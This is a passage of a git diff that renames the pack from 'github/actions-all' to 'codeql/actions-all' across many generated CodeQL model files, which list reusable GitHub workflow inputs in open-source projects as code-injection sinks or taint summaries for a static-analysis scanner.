b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml index 253c82f4bef..af7c7e94111 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["eclipse-vertx/vertx-sql-client/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml index eb1b3df774d..01a7939de43 100644 --- a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["elastic/elasticsearch-net/.github/workflows/release.yml", "*", "input.solution", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml index 3c6e1aaf658..efd1a84bfb5 100644 --- a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["element-hq/element-desktop/.github/workflows/build_windows.yaml", "*", "input.version", "code-injection", "generated"] 
@@ -10,7 +10,7 @@ extensions: - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "input.version", "code-injection", "generated"] - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "input.version", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.deploy", "output.deploy", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml index 3f66f287830..715a3861fd9 100644 --- a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["envoyproxy/envoy/.github/workflows/_load.yml", "*", "input.run-id", "output.run-id", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml index b45eabdf202..bad92ff7679 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "input.testTimeout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml index 76bb69800a9..90503b3ad3e 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["etcd-io/etcd/.github/workflows/tests-template.yaml", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml index 9af37394143..3d6de142622 100644 --- a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["eventstore/eventstore/.github/workflows/build-reusable.yml", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml index 9d0113eb8ec..ab48425c038 100644 --- a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["expensify/app/.github/workflows/e2ePerformanceTests.yml", "*", "input.PR_NUMBER", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml index 90ad3c0f9a1..6c0165b65a9 100644 --- a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "input.image-tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml index e07d783ae53..f33f433df1f 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["facebook/create-react-app/.github/workflows/e2e-base.yml", "*", "input.testScript", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml index 3d698b0a84b..fb700fa7a89 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.aws_s3_cp_extra_args", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml index 364bd19139e..60ab0a23c74 100644 --- a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "input.build_type", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml index 85d150cf11c..e0a72159a7b 100644 --- a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["fastify/fastify/.github/workflows/citgm-package.yml", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml index 612a114d79c..7483ab3366c 100644 --- a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ferretdb/ferretdb/.github/workflows/_integration.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml index 86267e5a921..137558d68d0 100644 --- a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "input.test_timeout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml index 31d0192f3fb..cb48bce89cf 100644 --- a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.triggered_by_callable", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml index 5116c943f69..9f8338302a3 100644 --- a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["flarum/framework/.github/workflows/REUSABLE_backend.yml", "*", "input.monorepo_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml index 85cb45df895..49f73a1d620 100644 --- a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["fluent/fluent-bit/.github/workflows/call-windows-unit-tests.yaml", "*", "input.unstable", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml index 4167f4bb982..e1e8de22530 100644 --- a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["flux-iac/tofu-controller/.github/workflows/targeted-test.yaml", "*", "input.pattern", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml index 04b9325cecd..c2f634f7d00 100644 --- a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["flyteorg/flyte/.github/workflows/publish.yml", "*", "input.before-build", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml index 60b966d98a4..89dcb32c453 100644 --- a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.org", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml index bbca585931c..2ea31953844 100644 --- a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["freecad/freecad/.github/workflows/sub_wrapup.yml", "*", "input.previousSteps", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml index a0b7c418967..b9e9d879a66 100644 --- a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.output-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml index 663826781e7..8a22c8415e6 100644 --- a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["getporter/porter/.github/workflows/build_pipelinesrelease_template.yml", "*", "input.registry", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml index c0b8992a678..a5db7a9533e 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "input.panaThreshold", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml index a7069a8fa4f..31113d603ff 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["getsentry/sentry-unity/.github/workflows/sdk.yml", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml index 3ec3c008301..d8e08a8e2bd 100644 --- a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gitpod-io/gitpod/.github/workflows/jetbrains-auto-update-template.yml", "*", "input.productId", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml index f4c09189ba6..b7478e325a2 100644 --- a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gittools/gitversion/.github/workflows/_artifacts_linux.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml index 46b715358e0..fff04025bc5 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules/.github/workflows/build-downstream.yml", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml index ca728bfced2..be5ac94db5c 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "input.path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml index c31b5c8fe0c..b8633806ac7 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gravitational/teleport/.github/workflows/update-ami-ids.yaml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml index e53c0a2780b..8e534e5be92 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gravitl/netmaker/.github/workflows/publish-docker.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml index 2c904674125..44aa0ea3a92 100644 --- a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.build-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml index cff10b709e9..cd17a2ca4a5 100644 --- a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "input.dry-run", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml index 31e4dbbf7ab..d96c0c99d0c 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml", "*", "input.version", "output.docker-image-tag", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml index 5aca8a7070d..f07f5ba54ea 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/boundary/.github/workflows/test-cli-ui_oss.yml", "*", "input.artifact-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml index 179c882eba1..39110829147 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "input.package-names-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml index a702bdd4784..196c25e14e9 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/terraform-cdk/.github/workflows/unit.yml", "*", "input.package", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml index 105a5b49f3d..7a2e2fea0eb 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/terraform-provider-tfe/.github/workflows/jira-issue-sync.yml", "*", "input.issue-extra-fields", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml index 4e4aa9f7986..d00a80de5d1 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.product-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml index 4272f3376ce..4f7926a22a6 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.sample-max", "code-injection", "generated"] @@ -15,7 +15,7 @@ extensions: - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "input.total-runners", "code-injection", "generated"] - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "input.storage_backend", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["hashicorp/vault/.github/workflows/build-artifacts-ce.yml", "*", "input.vault-version-package", "output.testable-packages", "taint", "manual"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml index 4752bce29b9..a0c0b5638dd 100644 --- a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["heroku/cli/.github/workflows/publish-npm.yml", "*", "input.isStableRelease", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml index e493955ca4c..494c63d6272 100644 --- a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.project_name", "code-injection", "generated"] - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.dependency_track_url", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.stage", "output.release_stage", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml index e3c0040f7df..bd855d53f13 100644 --- a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["home-assistant/operating-system/.github/workflows/test.yaml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml index daaa34ab8ab..f499896a72f 100644 --- a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.windowsBuildArgs", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml index 9bfe6180481..66bd5e8b99d 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.package_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml index d8cd44f08ee..fc0d7a48ca3 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "input.folder_slices", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml index 9b1fd73494e..e3a048ee25c 100644 --- a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.pull_request_number", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml index 2fafb1f39b6..db3fb546f0f 100644 --- a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml +++ 